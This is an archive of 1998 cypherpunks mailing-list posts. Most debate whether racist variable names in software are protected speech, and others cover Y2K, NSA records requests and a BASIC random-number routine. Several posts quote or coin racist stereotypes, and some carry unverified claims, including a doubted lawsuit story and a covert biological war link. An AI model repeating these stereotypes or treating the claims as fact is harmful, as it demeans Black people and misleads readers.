> -----BEGIN PGP SIGNED MESSAGE-----
> 
> In <19980825175524.13582.qmail@suburbia.net>, on 08/25/98
>    at 05:55 PM, proff@suburbia.net said:
> 
> >Jackson, who is now working as a full-time programmer at Dell Computers
> >in San Antonio, is not willing to give up her fight against IS despite
> >the slim chances of a legal victory. "At this point, I'm not interested
> >in the money," claims an unbowed Jackson, "I only want the public to
> >think twice about the kinds of hateful messages that may be hidden inside
> >the software they use everyday."
> 
> <sigh> Now we have to worry about PC variable and function names. What a
> crock.
> 
> Isn't there laws on the books that if you file a frivolous law suite like
> the one above and you loose then you have to pay the expenses of the other
> party?
> 
> 
	Well this far in the USA we do not have such a law :<
We should that way stupid fools that spill hot coffee on themselves will
not try to sue McDonalds for over 1.2 Million$ because the coffee was to
hot...   Go figure, hot coffee is not supposed to be hot.

Many other countries have laws that if your bring a case to court and
loose you pay the fees of the one you sued.  Any folks from around the
world that can attest to how your country handles cases?

			- lhe




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill payne <billp@nmol.com>
Date: Wed, 26 Aug 1998 07:46:13 -0700 (PDT)
To: j orlin grabbe <abumujahid@taliban.com
Subject: Real World thoughts
Message-ID: <35E41E6E.C88@nmol.com>
MIME-Version: 1.0
Content-Type: text/plain


Wednesday 8/26/98 7:11 AM

J Orlin Grabbe

1  Tuesday issue of the ABQ J always carries a special section on
computers.

  t 8/25/98 

  COUNTDOWN TO Y2K

  Cataclysm or inconvenience?

Of most interest to me was

  Old mainframes make sheer size of problem nearly overwhelming

  By Chris Allbritton
  The Associated Press

  NEW YORK -  The shear number of unique solutions needed for the Year
  2000 bug, not the technical aspects, are the real problem behind this
glitch
  in time. ...

for the reason of my book and translation

  Machine, Assembly, and System Programming for the IBM 360, New York:  
  Harper & Row, 1969 
                   
  Programacion en Lenguaje de Maquina, Asemblador, y de Sistemas con el 
  IBM 360, Harper & Row, 1971

In the 1970s some IBM 360/70/40xx were STILL running IBM 650 simulators
which
hosted code which companies did not want to rewrite!

The message published in the Monday ABQ J

                            	'98 Warning!
  Due to serious bugs and compatibility problems, we join many other PC 
  builders in recommending AGAINST Windows '98 at this time.

http://www.c-works.com/

makes me speculate that the hardware vendors were able to try out their
new hardware
on DOS, Win 3.xx, 95, NT but not on '98.

Since Microsoft may not have had new hardware like the AMD K6 -2 [3d],
'98 was
not fully exercised on the newer architectures.

I will send you page on Y2K.

And also the copy of

  NSA  deputy director Barbara McNamara's  wrote me a letter dated 19
August  1998.

  http://www.nsa.gov:8080/mission.html

  McNamara DENIED my fee waiver appeal for search for invoices NSA spent
on public key chips.

  From my inside dealings with NSA's R division and Sandia employees  I
learned that both had     some VERY UNFORTUNATE EXPERIENCES with public
key.

  I am sending both you and John Young copies of NcNamara's letter.

  McNamara wrote,

    This response may be construed as a denial of your appeal. 
Accordingly, you are hereby 
  advised to your right to seek judicial review of my decision pursuant
to 5 U.S.C.  552(a)(4)
  (B) in the United States District Court in the district in which you
reside, in which you have
  your principal place of business, in which the Agency's records are
situated (U.S. District
  Court of Maryland), or in the District of Columbia. 

  http://www.jya.com/hr105-37.txt 

I wonder if http://www.taliban.com/ is the 'real thing' or an
'intelligence agency'
spy plot?  Since we send

  Date: 
        Tue, 25 Aug 1998 13:43:24 -0600
  From: 
        bill payne <billp@nmol.com>
    To: 
        dpcintrn@osd.pentagon.mil, abumujahid@taliban.com

it doesn't matter too much either way.  We either get both or the same
twice.

I am reading http://www.aci.net/kalliste/

  Impeachment Watch

               The High Cost of the War on Terrorism

              Bill Clinton's $100 Million Crusade Against Ken Starr

                                        by Charles R. Smith

      August was an expensive month for the U.S. taxpayer. For example,
Bill Clinton shot $100       million on August 20, 1998 at "terrorist"
sites in Sudan and Afghanistan. The 79 Tomahawk        cruise missiles
signaled a new "war" that Bill Clinton decided to declare on terrorism
and       not to be confused with the $100 million White House "war" on
Ken Starr.  ...

Last night I was CAREFULLY STARTING to read HARCOPY OF
http://www.softwar.net/plight.html especially  

  Sensor input is processed through the A/D converter and provided as
raw 8 bit data which is     then saved in WAVformat. A program designed
to extract randomization values from the raw data    for use as a cipher
key could takevarious forms. One form would be to serially store    
non-repeating samples of data into fixed length blocks for processing,
such as 8 or 16 bytes.    The sampled values would then be summed,
XORed, left or right shift registered (LSR/RSR), least   significant bit
extracted, or any combination of math processes. The resulting byte of
data   would then represent the combination of photon values taken over
the time period of   
  the sample. Other processes could make use of various formulas, such
as lossy or LZ, to give     still other values for photons taken over
the selected time period of the sample. 

  10 CLS:DEFINT A-Y:DEFDBL Z
  20 OPEN "R",#1,"TEST.WAV",1
  30 FIELD #1, 1 AS D$:J=1:O=0
  40 Z1 = LOF(1):ZR=64:A=0:O$=""
  50 ZR=ZR+1:IF ZR>Z1 THEN GOTO 100
  60 GET #1,ZR:I$=D$
  70 GOSUB 110:IF FA=0 THEN GOTO 50
  80 E=E+1:IF E>255 THEN E=0
  90 GOTO 50
  100 CLOSE #1:STOP
  110 FA=0:SK=ASC(I$)+SK:IF SK>32510 THEN SK=SK-32510
  120 IF S$<>I$ THEN GOTO 130 ELSE RETURN
  130 FA=1:S$=I$:A=A+1:O$=O$+I$
  140 IF A=16 THEN GOTO 160
  150 RETURN
  160 A=0:B=0:O= E XOR J:K=SK MOD 256:O = K XOR O
  170 FOR N=1 TO 16:X$=MID$(O$,N,1)
  180 B=ASC(X$):O = B XOR O
  190 NEXT N:O$=""
  200 IF O=J THEN RETURN
  210 PRINT O;:J=O
  220 RETURN

I STARTED to analyze what Smith's BASIC code did. 

I am STILL THINKING ABOUT the REASONS FOR

110 FA=0:SK=ASC(I$)+SK:IF SK>32510 THEN SK=SK-32510

which contains PROBABLY ZERO-initialized variable SK.

Smith will likely NOT be indicted by BXA  

http://www.bxa.doc.gov/FOIA/Foiaintro.htm
http://www.bxa.doc.gov/FOIA/Foialib.htm

for distributing controlled code on Internet.

The statement

  The sampled values would then be summed, XORed, left or right shift
registered (LSR/RSR), least 
  significant bit extracted, or any combination of math processes.

does NOT EXACTLY TELL what Smith is doing in PCYPHER ENCRYPTION USING
LIGHT.

But Smith's APPARENT belief that terminal bits of samples taken from
continuous distributions are, we believe, uniformly distributed.

    Payne, W. H., and T. G. Lewis, Continuous Distribution
    Sampling:  Accuracy and Speed, Mathematical Software,
    ed., J. R. Rice, Academic Press:  New York (1971), pp.
    331-345. 

    Lewis, T. G., and W. H. Payne, Generalized Feedback
    Shift Register Pseudorandom Number Algorithm, Journal
    of Assn. for Computing Machinery, 21, 3 (1973): 456-
    468. 

http://www-hto.usc.edu/software/seqaln/doc/html/gfsr.3.html
http://www.friction-free-economy.com       

    Sobolewski, J. S., and W. H. Payne, Pseudonoise with
    Arbitrary Amplitude Distribution:  Part I:  Theory,
    IEEE Transactions On Computers, 21 (1972): 337-345. 
                   
    Sobolewski, J. S., and W. H. Payne, Pseudonoise with
    Arbitrary Amplitude Distribution:  Park II:  Hardware
    Implementation, IEEE Transactions on Computers, 21
    (1972): 346-352. 

http://www.mhpcc.edu/general/john.html       

HOWEVER, us the the REAL PRACTICAL WORLD http://jya.com/da/whpda.htm
might be a bit concerned
what happens if the sensor output voltage exceeds EITHER in a plus or
minus direction the INPUT range of the a/d converter.

     http://www.softwar.net/plight.html
     Collector-Emitter Voltage 30 Volt 
     Emitter-Collector Voltage 5 Volt 

If the input voltage goes SOMEWHAT HIGHER, then the terminal bit MAY BE
A 1 and not random.

On the other hand, if the input voltage goes SOMEWHAT LOWER, then the
terminal bit MAY BE A 
0 and not random.

If the input voltages goes LOTS HIGHER OR LOWER than the limits, it is
SAYONARA a/d converter!
The Real World again.

SOME NSA KG schematics Brian Snow showed me had statistical test
hardware built in to ATTEMPT to
detect non-random output.  If the output failed the test, then the KG
unit shut down.

Smith, I think, has a neat idea which needs to be looked at VERY
CAREFULLY.

Some of us continue to feel that the crypto key must be as long as the
message encrypted.  As was pointed out by Gilbert S. Vernam and Joseph
O. Mauborgne in 1918.

Pseudorandom sequences DON'T WORK VERY WELL FOR ENCRYPTION.

  Pcypher Light is designed to measure the number of photons from around
your PC (light     particles) and create a random numbers from that
light. Pcypher Light is NOT just software but   hardware as well. It is
easy to install and use.  We give you SOFTWAR's advanced technology    
Light Probe, a highly sensitive phototransistor, which the software
samples at thousands of     times per second. Think of it as a
microphone for light. In fact all you have to do is plug it   directly
into the MIC input of any PC sound card. That is it. Run the PC Windows
software and   start making REAL randomized keys. NOT A PSEUDO KEY
GENERATOR.

Two reasons are

1  There should always be TWO KEYs.  The 'real key' and the key you
claim IN A LEGAL-SENSE is the 'real key' in case you get CAUGHT.

     A  Nuke them
     B  Send flowers

If you send A be sure to have a B key and a receipt for the flowers.

2  Pseudorandom sequences MAY make it difficult to find the SECOND key.

So let's hope these crypto messes 

http://www.aci.net/kalliste/speccoll.htm   
http://caq.com/cryptogate  
http://jya.com/whpfiles.htm  
http://www.qainfo.se/~lb/crypto_ag.htm

gets SETTLED SO THAT WE CAN ALL DEBATE TECHNICAL ISSUES and PUBLISH our
results in RECOGNIZED SCIENTIFIC JOURNALS and POST on the Infobahn too.

I want to revise my book for Windows and the 80C32 too.

Best
bill
http://www.apcatalog.com/cgi-bin/AP?ISBN=0125475705&LOCATION=US&FORM=FORM2         
http://jya.com/f86/whpf86.htm






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim.profit@usa.net
Date: Wed, 26 Aug 1998 02:52:50 -0700 (PDT)
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <19980826095247.17627.qmail@www09.netaddress.usa.net>
MIME-Version: 1.0
Content-Type: text/plain


Subject: US fighting a covert biological war?
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit

http://www.arabia.com/content/living/8_98/worm_25.8.98.shtml
http://www.arabia.com/content/news/8_98/shifa24.8.98.shtml



____________________________________________________________________
Get free e-mail and a permanent address at http://www.netaddress.com/?N=1




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dan Stromberg <strombrg@nis.acs.uci.edu>
Date: Wed, 26 Aug 1998 10:51:22 -0700 (PDT)
To: lacc@suburbia.net
Subject: Re: LACC: Re: Is hate code speech?
In-Reply-To: <199808252227.RAA004.35@geiger.com>
Message-ID: <35E44AD1.442F@nis.acs.uci.edu>
MIME-Version: 1.0
Content-Type: text/plain


William H. Geiger III wrote:
> 
> -----BEGIN PGP SIGNED MESSAGE-----
> 
> In <Pine.SUN.3.91.980825155854.3483A-100000@baker>, on 08/25/98
>    at 04:19 PM, Xcott Craver <caj@math.niu.edu> said:
> 
> >On Tue, 25 Aug 1998, William H. Geiger III wrote:
> 
> >> <sigh> Now we have to worry about PC variable and function names. What a
> >> crock.
> 
> >       Oh, yeah, you really have to worry about *accidentally*
> >       calling your variables getwatermelons and somefriedchicken.
> >       Reminds me of this one guy in our neighborhood who was just
> >       jogging by our house, bent down to tie a shoelace, lost
> >       his balance and accidentally planted a huge burning cross
> >       in our front lawn.  Woops!  Those damn PC-mongers are
> >       making it a crime to jog!
> 
> Yes and if I want to name my variables getwatermelons and somefiredchicken
> who are you to tell me I can't?

A company worth working for will have a policy that tells you you
cannot.  (Ok, those variables are a fuzzy issue - Very bad taste. The
violent stuff mentioned in the original article is clear cut, however)

> >       One note:  I don't see why this lawsuit would be hard to win
> >       on the grounds that source code isn't necessarily "speech."
> >       If co-workers left a big wooden swastika on her desk it
> >       wouldn't be speech either, but I'd call that actionable.
> 
> But they didn't. There is no proof that any of theses variable names were
> written to be directed at her and the majority of them were written
> *before* she ever started working there!!

So what's your point?

Creating a hostile environment with the expectation that you'll never
hire someone who's black is "ok"?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mcw@atreus.ncs.ncsc.mil
Date: Wed, 26 Aug 1998 08:51:26 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Is Hate Code Speech?
Message-ID: <9808261651.AA06929@atreus.noname>
MIME-Version: 1.0
Content-Type: text/plain


I've searched the web and newsgroups several times, and found no mention
of "Willa Jackson".  I find it unlikely that this is real.

Despite my respect for Mr. Geiger, I must disagree - I don't find the
suit frivolous at all.

Briefly, I think that anyone who maintains software will agree that
naming variables & functions by any standard other than that of their
function is poor programming practice, and impedes maintenance.  Clearly
the authors of the code had some intent other than that of writing
maintainable code.  The fact that there were one or more coherent themes
in the names chosen indicates that their agenda was probably coherent.
The fact that management took no action when informed of this indicates
a complicity.

In essence, I believe that we are all entitled to a workplace free of
hate, and full of respect for our professional abilities.  For sheer
economic reasons, I think that the management of any responsible firm
will act to ensure that (respect is worth quite a few $$ in
compensation).

I acknowledge that you're welcome to use whatever variable names you
want in code you write in private. BUt if you want to sell that code, it
should be held to a standard of professionalism.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dan Stromberg <strombrg@nis.acs.uci.edu>
Date: Wed, 26 Aug 1998 11:56:29 -0700 (PDT)
To: "William H. Geiger III" <whgiii@openpgp.net>
Subject: Re: LACC: Re: Is hate code speech?
In-Reply-To: <199808261844.NAA016.34@geiger.com>
Message-ID: <35E45A31.1CD2@nis.acs.uci.edu>
MIME-Version: 1.0
Content-Type: text/plain


William H. Geiger III wrote:
> 
> -----BEGIN PGP SIGNED MESSAGE-----
> 
> In <35E44AD1.442F@nis.acs.uci.edu>, on 08/26/98
>    at 12:50 PM, Dan Stromberg <strombrg@nis.acs.uci.edu> said:
> 
> >William H. Geiger III wrote:
> >>
> >> -----BEGIN PGP SIGNED MESSAGE-----
> >>
> >> In <Pine.SUN.3.91.980825155854.3483A-100000@baker>, on 08/25/98
> >>    at 04:19 PM, Xcott Craver <caj@math.niu.edu> said:
> >>
> >> >On Tue, 25 Aug 1998, William H. Geiger III wrote:
> >>
> >> >> <sigh> Now we have to worry about PC variable and function names. What a
> >> >> crock.
> >>
> >> >       Oh, yeah, you really have to worry about *accidentally*
> >> >       calling your variables getwatermelons and somefriedchicken.
> >> >       Reminds me of this one guy in our neighborhood who was just
> >> >       jogging by our house, bent down to tie a shoelace, lost
> >> >       his balance and accidentally planted a huge burning cross
> >> >       in our front lawn.  Woops!  Those damn PC-mongers are
> >> >       making it a crime to jog!
> >>
> >> Yes and if I want to name my variables getwatermelons and somefiredchicken
> >> who are you to tell me I can't?
> 
> >A company worth working for will have a policy that tells you you cannot.
> >(Ok, those variables are a fuzzy issue - Very bad taste. The violent
> >stuff mentioned in the original article is clear cut, however)
> 
> Company policy and federal law are two different things. A company should
> be able to set their policy to whatever they want, don't like it don't
> work there.

Gosh, no kidding?  Company policy isn't the same as fed law?

As I said, a company worth working for, will have a policy that
creates/preserves a decent working environment.

> Also please explain exactly what "violent stuff" you are in reference to
> and how it is "clear cut".

Violence is obviously out of line.  Or do you like being threatened?

> >Creating a hostile environment with the expectation that you'll never
> >hire someone who's black is "ok"?
> 
> 1st off the whole notion of "hostile environment" is bunk. It is a loosely
> undefined term to mean anything the PC crowd wants it to. If you do or say

I can see you're not worth bothering with.

Sad that I wasted this much time responding.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Wed, 26 Aug 1998 11:58:01 -0700 (PDT)
To: Dan Stromberg <lacc@suburbia.net
Subject: Re: LACC: Re: Is hate code speech?
In-Reply-To: <199808252227.RAA004.35@geiger.com>
Message-ID: <v03130303b20a0935794a@[209.66.100.140]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:50 AM -0700 8/26/98, Dan Stromberg wrote:

>A company worth working for will have a policy that tells you you
>cannot.  (Ok, those variables are a fuzzy issue - Very bad taste. The
>violent stuff mentioned in the original article is clear cut, however)

This is not the issue. Maybe a company will have a policy forbidding flaky
or unusual variable names, maybe it won't. Maybe it will even encourage
such names.

The issue is whether the government or the courts has any right to
intervene to force changes in such matters.

....
>So what's your point?
>
>Creating a hostile environment with the expectation that you'll never
>hire someone who's black is "ok"?

In a free society, of course it should be legal, even if not desireable to
many.

Consider some parallels.

* The Hitler Corporation is dedicated to selling literature and memorabilia
exalting Adolph Hitler. It sells "Mein Kampf." It sells Nazi flags. It
sells scale models of the Auschwitz crematoria. All very legal to do, at
least in the United States.

However, Jewish employees feel offended. They consider the Hitler
Corporation to have a "hostile environment."

What are their options? In a free society, they walk. In fact, they were
fools to ever apply for jobs, and THC was foolish to hire them.

* The Carnivore's Den is a meat-only restaurant. Alice B. Vegan feels
offended that she is "forced" to serve meat, and she feels her civil rights
are being violated by the restaurant.

And so on. Non-Mormons feel slighted at Mormon bookstores. Satanists feel
slighted at Christian day care centers. And honkies feel out of place at
Rastafarian Chicken and Watermelon roadside stands.

So? The right to "fit in" in all places is not a right, only a wish.

--Tim May



"The tree of liberty must be watered periodically with the blood of
tyrants...."
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist              | black markets, collapse of governments.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@openpgp.net>
Date: Wed, 26 Aug 1998 10:14:09 -0700 (PDT)
To: mcw@atreus.ncs.ncsc.mil
Subject: Re: Is Hate Code Speech?
In-Reply-To: <9808261651.AA06929@atreus.noname>
Message-ID: <199808261721.MAA014.73@geiger.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In <9808261651.AA06929@atreus.noname>, on 08/26/98 
   at 11:51 AM, mcw@atreus.ncs.ncsc.mil said:

>I've searched the web and newsgroups several times, and found no mention
>of "Willa Jackson".  I find it unlikely that this is real.

>Despite my respect for Mr. Geiger, I must disagree - I don't find the
>suit frivolous at all.

>Briefly, I think that anyone who maintains software will agree that
>naming variables & functions by any standard other than that of their
>function is poor programming practice, and impedes maintenance.  Clearly
>the authors of the code had some intent other than that of writing
>maintainable code.  The fact that there were one or more coherent themes
>in the names chosen indicates that their agenda was probably coherent.
>The fact that management took no action when informed of this indicates a
>complicity.

>In essence, I believe that we are all entitled to a workplace free of
>hate, and full of respect for our professional abilities.  For sheer
>economic reasons, I think that the management of any responsible firm
>will act to ensure that (respect is worth quite a few $$ in
>compensation).

>I acknowledge that you're welcome to use whatever variable names you want
>in code you write in private. BUt if you want to sell that code, it
>should be held to a standard of professionalism.

Yes but should this "standard" be enforced by law? Last time I looked
there was no Constitutional right not to be offended. There is a very
strong Constitutional right to freedom of speech and the courts have long
ruled that it is not just popular speech that is protected.

IMHO, this whole matter is an internal company matter. The courts and
politicians should have no say in it.


- -- 
- ---------------------------------------------------------------
William H. Geiger III  http://www.openpgp.net
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 5.0 at: http://www.openpgp.net/pgp.html
- ---------------------------------------------------------------
 
Tag-O-Matic: Windows?  WINDOWS?!?  Hahahahahehehehehohohoho...

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a-sha1
Charset: cp850
Comment: Registered_User_E-Secure_v1.1b1_ES000000

iQCVAwUBNeREH49Co1n+aLhhAQFOMAP/XfSLbwpHMjGhoAdRX/lVsO1o8Esu+Zzk
xbTscHRO8Kw8pEHZkc3PJ9jX/sHy4sd5+LCul6sNjR1pK4s3zwkVAwd3/MbHuW4S
JoFBr6k/myD675LAMgYFpkecntmCN6XPxNmsLFtawPURMAUmu0vAyCgmM9w7smTo
VIcI3N6C3mU=
=mJTj
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Chip <turk182@joshua.chipware.net>
Date: Wed, 26 Aug 1998 12:19:29 -0700 (PDT)
To: Ray Arachelian <sunder@brainlink.com>
Subject: Re:
In-Reply-To: <35E45684.BA1CC753@brainlink.com>
Message-ID: <Pine.LNX.3.96.980826121813.29545A-100000@joshua.chipware.net>
MIME-Version: 1.0
Content-Type: text/plain


> Anonymous wrote:
> > 
> > http://www.itd.nrl.navy.mil/ITD/5540/ieee/cipher/news-items/980713.LISTWATCH
> > .html
> > 
> > My online review of this list and others.
> > 
> > Mary Ellen Zurko
> > "We will be obliged to take action ourselves" -Gore on privacy
> 
> 
> Sorry Anon, but that url 404's... Perhaps you could try again?

perhaps you could try:

http://www.itd.nrl.navy.mil/ITD/5540/ieee/cipher/news-items/980713.LISTWATCH.html

don't give up so easily  =)



---
The above comment is not necessarily that of the author.
Chip is chip@chipware.net - PGP, ICQ, PINE, LINUX, YEAH BABY!
Fremont, California, USA, Earth, Sol ~ http://www.chipware.net





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dan Stromberg <strombrg@nis.acs.uci.edu>
Date: Wed, 26 Aug 1998 12:49:11 -0700 (PDT)
To: "William H. Geiger III" <whgiii@openpgp.net>
Subject: Re: LACC: Re: Is hate code speech?
In-Reply-To: <199808261937.OAA017.62@geiger.com>
Message-ID: <35E4652F.66D2@nis.acs.uci.edu>
MIME-Version: 1.0
Content-Type: text/plain


William H. Geiger III wrote:
> >Sad that I wasted this much time responding.
> 
> Why, because I challenge your PC dogma and require to to rationally
> justify it? We have an old saying here "If you are scared son, then say
> you are scared". If you are unable to rationally and objectively justify
> your PC dogma than just say so.

Smirk.  /I'm terrified/  I've said it before, and I'll say it again:

Never wrestle with a pig.  You both get dirty, and the pig likes it.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@openpgp.net>
Date: Wed, 26 Aug 1998 11:37:15 -0700 (PDT)
To: Dan Stromberg <strombrg@nis.acs.uci.edu>
Subject: Re: LACC: Re: Is hate code speech?
In-Reply-To: <35E44AD1.442F@nis.acs.uci.edu>
Message-ID: <199808261844.NAA016.34@geiger.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In <35E44AD1.442F@nis.acs.uci.edu>, on 08/26/98 
   at 12:50 PM, Dan Stromberg <strombrg@nis.acs.uci.edu> said:

>William H. Geiger III wrote:
>> 
>> -----BEGIN PGP SIGNED MESSAGE-----
>> 
>> In <Pine.SUN.3.91.980825155854.3483A-100000@baker>, on 08/25/98
>>    at 04:19 PM, Xcott Craver <caj@math.niu.edu> said:
>> 
>> >On Tue, 25 Aug 1998, William H. Geiger III wrote:
>> 
>> >> <sigh> Now we have to worry about PC variable and function names. What a
>> >> crock.
>> 
>> >       Oh, yeah, you really have to worry about *accidentally*
>> >       calling your variables getwatermelons and somefriedchicken.
>> >       Reminds me of this one guy in our neighborhood who was just
>> >       jogging by our house, bent down to tie a shoelace, lost
>> >       his balance and accidentally planted a huge burning cross
>> >       in our front lawn.  Woops!  Those damn PC-mongers are
>> >       making it a crime to jog!
>> 
>> Yes and if I want to name my variables getwatermelons and somefiredchicken
>> who are you to tell me I can't?

>A company worth working for will have a policy that tells you you cannot. 
>(Ok, those variables are a fuzzy issue - Very bad taste. The violent
>stuff mentioned in the original article is clear cut, however)

Company policy and federal law are two different things. A company should
be able to set their policy to whatever they want, don't like it don't
work there.

Also please explain exactly what "violent stuff" you are in reference to
and how it is "clear cut".

>> >       One note:  I don't see why this lawsuit would be hard to win
>> >       on the grounds that source code isn't necessarily "speech."
>> >       If co-workers left a big wooden swastika on her desk it
>> >       wouldn't be speech either, but I'd call that actionable.
>> 
>> But they didn't. There is no proof that any of theses variable names were
>> written to be directed at her and the majority of them were written
>> *before* she ever started working there!!

>So what's your point?

>Creating a hostile environment with the expectation that you'll never
>hire someone who's black is "ok"?

1st off the whole notion of "hostile environment" is bunk. It is a loosely
undefined term to mean anything the PC crowd wants it to. If you do or say
anything that might "offend" a PCer then you have a "hostile workplace".
As I said in previous posts you do not have a right to not be offended not
only that but thanks to the 1st Amendment I have the right to offend you.

One should be very carefull of this whole notion of protecting people from
being offended. Not only does it erode the rights protected under the
Constitution but it can very easily be turned against those who are
promoting it. Political tides are turning and the country as a whole is
getting fed up with the PC crowd. I can see lawsuits in the not to distant
future against the Pcer for creating a "hostile workplace" by pushing
their PC dogma.


- -- 
- ---------------------------------------------------------------
William H. Geiger III  http://www.openpgp.net
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 5.0 at: http://www.openpgp.net/pgp.html
- ---------------------------------------------------------------
 
Tag-O-Matic: Double your drive space! Delete Windows!

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a-sha1
Charset: cp850
Comment: Registered_User_E-Secure_v1.1b1_ES000000

iQCVAwUBNeRXiI9Co1n+aLhhAQEBHQQAsSUpThEplcfGgsZW2Q6+iqHyp0anMP30
iDAYhd7nhiUE7IpjeeBLSOZAVNYGtgeAtz2fV16EN7watpUtY8DHfDgVdvLPuAr+
FmeQECWpEgl3H+r2diGQYnY9uSAbWew9B6qME6hL0iFdtpT+QNjsxBA0XU0sVWvZ
x/7rhIhb/Lo=
=R9GK
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Xcott Craver <caj@math.niu.edu>
Date: Wed, 26 Aug 1998 11:40:49 -0700 (PDT)
To: "William H. Geiger III" <whgiii@openpgp.net>
Subject: Re: Is Hate Code Speech?
In-Reply-To: <199808261721.MAA014.73@geiger.com>
Message-ID: <Pine.SUN.3.91.980826132122.4771A-100000@baker>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 26 Aug 1998, William H. Geiger III wrote:

> Yes but should this "standard" be enforced by law? Last time I looked
> there was no Constitutional right not to be offended.

	Yet harassment is actionable.  Nutty, huh?  And it's just
	the tip of the iceberg:  apparently the law protects you
	from being severely beaten, despite the fact that there is
	no explicit constitutional right not to be severely beaten.

	Not trying to equate harassment with a severe beating, just
	pointing out that the lack of an explicit constitutional 
	right does not magically nullify the rest of the law.

> strong Constitutional right to freedom of speech and the courts have long
> ruled that it is not just popular speech that is protected.

	Indeed, "popular" speech is, almost by definition, the kind
	of speech that never really needs protection.  That first amendment
	wouldn't have much of a purpose if it only protected popular
	stuff.
	
> IMHO, this whole matter is an internal company matter. The courts and
> politicians should have no say in it.

	It WAS an internal company matter, apparently, but the 
	company didn't seem to do anything to remedy it.  That's 
	when you turn to law.  

							-Caj




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@openpgp.net>
Date: Wed, 26 Aug 1998 12:01:02 -0700 (PDT)
To: "Francis, Catherine" <cfrancis@securitydynamics.com>
Subject: RE: LACC: Re: Is hate code speech?
In-Reply-To: <6B5344C210C7D011835C0000F8012766020BB4B0@exna01.securitydynamics.com>
Message-ID: <199808261908.OAA016.61@geiger.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In <6B5344C210C7D011835C0000F8012766020BB4B0@exna01.securitydynamics.com>,
on 08/26/98 
   at 02:27 PM, "Francis, Catherine" <cfrancis@securitydynamics.com> said:

>I worry that, in the process of laying all this flame-bait, y'all are
>hoping that naive people might think that a job where there's racial and
>sexual hate-speech isn't a hostile work environment.  Putting this sort
>of language in code does not shelter it from co-workers.

1: In a free and open society one should be able to debate and analyze any
topic of their choosing, even your precious PC dogma. Rather than debate
the issues at hand you choose to use words like "flame-bait" and "troll"
in a weak and obvious attempt to minimize any criticism of your cherished
beliefs.

2: y'all <-- We wouldn't be trying to make an subtle ethnic slur here are
we. Oh I forgot the PC crowd can attack whites, jews, asians (if they make
too much money), southerners, ...ect and that's ok. Do you do this at
work? Are you creating a "hostile workplace" with your anti-souther bais??
Do you see how silly this whole "hostile workplace" concept is??

3: please define "hate-speech" and show where in the 1st Amendments or the
numerous SC ruling that there is "Freedom of Speech" except for speech
that *you* don't like. Please explain where your "right" not to be offened
is derived from.

>	It doesn't matter that the offensive names weren't directed at her. It's
>much worse that they were directed towards an entire group.  Or maybe you
>just admire ethnic slander in terms of cost-efficiency, a sort of
>more-bang-for-the-buck maximization of intolerance where it's a question
>of offending the greatest number with the least amount of effort, and
>simply admire the mechanism by which it's been accomplished?

>	This isn't an issue of free speech.  Well, maybe.  The coder is free to
>name her/his/its variables what they like, all ethical issues aside, and
>equally free to live with the consequences of those actions, which should
>have been the company not using something so vastly unprofessional and
>guaranteed to eventually open them up to a suit like this.  There are
>standards of behavior in a workplace that are slightly more restrictive
>than standing on a soapbox on the quad.  A software company's code is an
>internal company document.  The code that you write at home is your
>document.  You may find this distinction instructive.


This is strictly an issue of free speech. Wether you *like* what I have to
say is not an issue, I still retain the right to say it. The fact of
*where* I say it is irrelevant. If I want to tell a dirty joke, or make a
"racist" comment at work that is my *right* to do so. If my employer
objects to that behavior then it is his right to take whatever action he
feels necessary (upto and including fireing me). This is a matter between
myself and my employer and does not involve the courts or the politicians.

>I'm sorry to digress, since this isn't why the article was originally
>posted, but I was forced to succumb to the troll.  Free speech is
>essential in an open society.   Freedom from discrimination is essential
>in a democracy.   Carry on.

Oh no, you were not "forced", you willfully jumped right in with your
emotional dribble, fearful of open, objective, debate of your precious PC
dogma.

- -- 
- ---------------------------------------------------------------
William H. Geiger III  http://www.openpgp.net
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 5.0 at: http://www.openpgp.net/pgp.html
- ---------------------------------------------------------------
 
Tag-O-Matic: Windows?  Homey don't play that!

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a-sha1
Charset: cp850
Comment: Registered_User_E-Secure_v1.1b1_ES000000

